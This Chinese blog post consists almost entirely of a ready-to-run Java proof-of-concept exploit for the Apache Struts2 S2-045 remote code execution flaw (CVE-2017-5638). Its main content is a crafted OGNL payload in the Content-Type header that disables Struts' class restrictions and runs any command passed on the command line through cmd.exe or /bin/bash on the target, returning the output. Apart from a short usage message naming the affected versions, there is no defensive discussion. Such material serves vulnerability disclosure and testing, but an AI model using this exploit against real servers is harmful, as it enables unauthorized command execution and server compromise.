现在的位置: 首页 > 网络安全 > 正文

Struts2爆远程代码执行漏洞(S2-045 CVE-2017-5638),java版POC

2017年03月07日 网络安全 ⁄ 共 2884字 ⁄ 字号 暂无评论

 

https://github.com/Mofree/SecurityTools/tree/master/script

package demo;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

public class Stpoc {
public Stpoc() {
}

public static String getContext(URL url, String encode, String commend) {
StringBuffer contentBuffer = new StringBuffer();
boolean responseCode = true;
HttpURLConnection con = null;

try {
con = (HttpURLConnection)url.openConnection();
con.setRequestProperty("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36");
con.setRequestProperty("Content-Type", "%{(#nike=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=\'" + commend + "\').(#iswin=(@java.lang.System@getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(#cmds=(#iswin?{\'cmd.exe\',\'/c\',#cmd}:{\'/bin/bash\',\'-c\',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}");
con.setConnectTimeout('\uea60');
con.setReadTimeout('\uea60');
int responseCode1 = con.getResponseCode();
if(responseCode1 == -1) {
System.out.println(url.toString());
con.disconnect();
} else {
if(responseCode1 < 400) {
InputStream e = con.getInputStream();
InputStreamReader istreamReader = new InputStreamReader(e, encode);
BufferedReader buffStr = new BufferedReader(istreamReader);
String str = null;

while((str = buffStr.readLine()) != null) {
contentBuffer.append(str);
}

e.close();
return contentBuffer.toString();
}

System.out.println(responseCode1);
con.disconnect();
}
} catch (IOException var13) {
var13.printStackTrace();
contentBuffer = null;
System.out.println(url.toString());
return contentBuffer.toString();
} finally {
con.disconnect();
}

return null;
}

public static String getHtmlContent(String url, String encode, String commend) {
if(!url.toLowerCase().startsWith("http://")) {
url = "http://" + url;
}

try {
URL e = new URL(url);
return getContext(e, encode, commend);
} catch (Exception var4) {
var4.printStackTrace();
return null;
}
}

public static void main(String[] args) {
if(args.length < 1) {
System.out.println("[!]Use : java \n");
System.out.println("[!]Affects Version: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10\n");
System.out.println("[!]CVE ID : CVE-2017-5638\n");
System.out.println("[!]Reference : https://cwiki.apache.org/confluence/display/WW/S2-045\n");
System.exit(0);
} else {
String url = args[0];
String commend = args[1];
System.out.print(getHtmlContent(url, "utf-8", commend));
}
}
}

给我留言

您必须 [ 登录 ] 才能发表留言!

×